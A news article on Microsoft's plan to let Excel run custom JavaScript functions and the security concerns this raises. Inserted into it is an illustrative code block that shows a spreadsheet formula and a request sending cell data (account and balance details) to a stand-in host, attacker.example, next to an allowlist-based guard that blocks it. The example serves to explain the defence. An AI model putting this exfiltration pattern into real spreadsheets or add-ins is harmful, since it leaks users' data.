On Monday at its Build conference in Seattle, Microsoft announced a host of software products and updates related to buzzy technologies like machine learning[1] and mixed reality. But the company also debuted a number of smaller upgrades to existing products, including a new Excel feature[2] that allows users to execute custom JavaScript functions in spreadsheets. That might be helpful for spreadsheet junkies, but it makes security researchers cringe.
The move is well-intentioned; it should make Excel more powerful by letting users pull live information from the web and third-party services into a spreadsheet—think bank account balances or stock prices. But JavaScript also creates more interconnection and more access points[3], and every new way for a spreadsheet to reach out to the network is a new point of potential vulnerability. JavaScript is already at the center of many web security problems[4]. On top of that, attackers have long exploited the customization and automation features in Excel and other Microsoft Office programs, VBA macros above all, to build malicious files for phishing and other attacks. The ubiquity of Microsoft Office files makes them an ideal vector for tricking victims and wreaking havoc.
Streamlining the tool for legitimate users could make it more effective for attackers.
"JavaScript opens up another attack vector for malicious documents, and is yet another thing that we as defenders will have to watch out for other than what Excel can already do," says Chase Dardaman, a malware analysis researcher based in Texas. "The main concern is that since JavaScript usage in Excel is so new we do not know what controls Microsoft will put around it. They will need to make it more open and easier to use than it currently is, and that could open up new attack vectors."
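To make the concern concrete, here is an added illustration (not code from the article, and not Microsoft's Excel add-in API) of the kind of web-fetching custom function the article describes, first without any egress control and then behind the sort of control Dardaman says defenders will be looking for. The hostnames, the function names, and the `transport(url)` callback that stands in for the add-in runtime's network call are all assumptions so that the example runs offline; the real registration of a custom function with Excel is omitted.

```javascript
// Added example: models a spreadsheet custom function that fetches web data.
// Nothing here is Microsoft's API; hostnames and function names are assumed, and the
// network call is injected as `transport(url) -> body` so the code runs offline.

const ALLOWED_HOSTS = new Set(["quotes.example.com"]); // assumed allowlist of data providers
const MAX_URL_LENGTH = 256; // caps how much cell content a formula can smuggle into a URL

// Constructed fake transport: records every URL requested and returns canned bodies,
// standing in for fetch()/XMLHttpRequest inside the add-in runtime.
function makeFakeTransport(canned) {
  const log = [];
  const transport = (url) => {
    log.push(url);
    return Object.prototype.hasOwnProperty.call(canned, url) ? canned[url] : "";
  };
  return { transport, log };
}

// Unrestricted: exactly what the formula asks for gets fetched. A formula such as
//   =WEBGET("https://attacker.example/collect?d=" & A1 & B1)
// turns the custom function into an exfiltration channel for cell contents.
function webGet(url, transport) {
  return transport(url);
}

// Egress policy: https only, allowlisted hosts only, bounded URL length.
// Returns null when the request is allowed, otherwise a reason string.
function checkEgress(url) {
  let parsed;
  try {
    parsed = new URL(url);
  } catch (e) {
    return "malformed URL";
  }
  if (parsed.protocol !== "https:") return "non-https scheme";
  if (!ALLOWED_HOSTS.has(parsed.hostname)) return "host not allowlisted: " + parsed.hostname;
  if (url.length > MAX_URL_LENGTH) return "URL too long";
  return null;
}

function guardedWebGet(url, transport) {
  const reason = checkEgress(url);
  if (reason !== null) throw new Error("egress blocked (" + reason + "): " + url);
  return transport(url);
}

// Intended use: the formula supplies a ticker, not a URL, so the caller can neither
// choose the destination nor append arbitrary cell data to the request.
function stockPrice(symbol, transport) {
  if (!/^[A-Z]{1,6}$/.test(symbol)) throw new Error("invalid ticker: " + symbol);
  const url = "https://quotes.example.com/price?symbol=" + encodeURIComponent(symbol);
  const price = Number(guardedWebGet(url, transport));
  if (!Number.isFinite(price)) throw new Error("unparseable quote for " + symbol);
  return price;
}

// Stand-alone demo over a constructed canned response and a constructed exfiltration URL.
function demo() {
  const { transport, log } = makeFakeTransport({
    "https://quotes.example.com/price?symbol=MSFT": "97.80",
  });
  const exfil =
    "https://attacker.example/collect?d=" + encodeURIComponent("acct 1234, balance 99000");

  const price = stockPrice("MSFT", transport); // legitimate, allowlisted request
  webGet(exfil, transport); // unrestricted: the exfiltration request goes out
  const unrestrictedLeaked = log.includes(exfil);

  let guardedBlocked = false;
  try {
    guardedWebGet(exfil, transport); // guarded: rejected before any request is made
  } catch (e) {
    guardedBlocked = true;
  }
  return { price, unrestrictedLeaked, guardedBlocked, requestsSent: log.length };
}

console.log(JSON.stringify(demo()));
```

The point of the guarded form is that the allowlist and the fixed URL template, not the formula author, decide where the request goes and how much of the sheet rides along with it; that is the kind of control the quoted concern is about, and whatever Microsoft ships will be judged on whether it offers something equivalent.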
JavaScript is an extremely popular programming language, and has been around since 1995.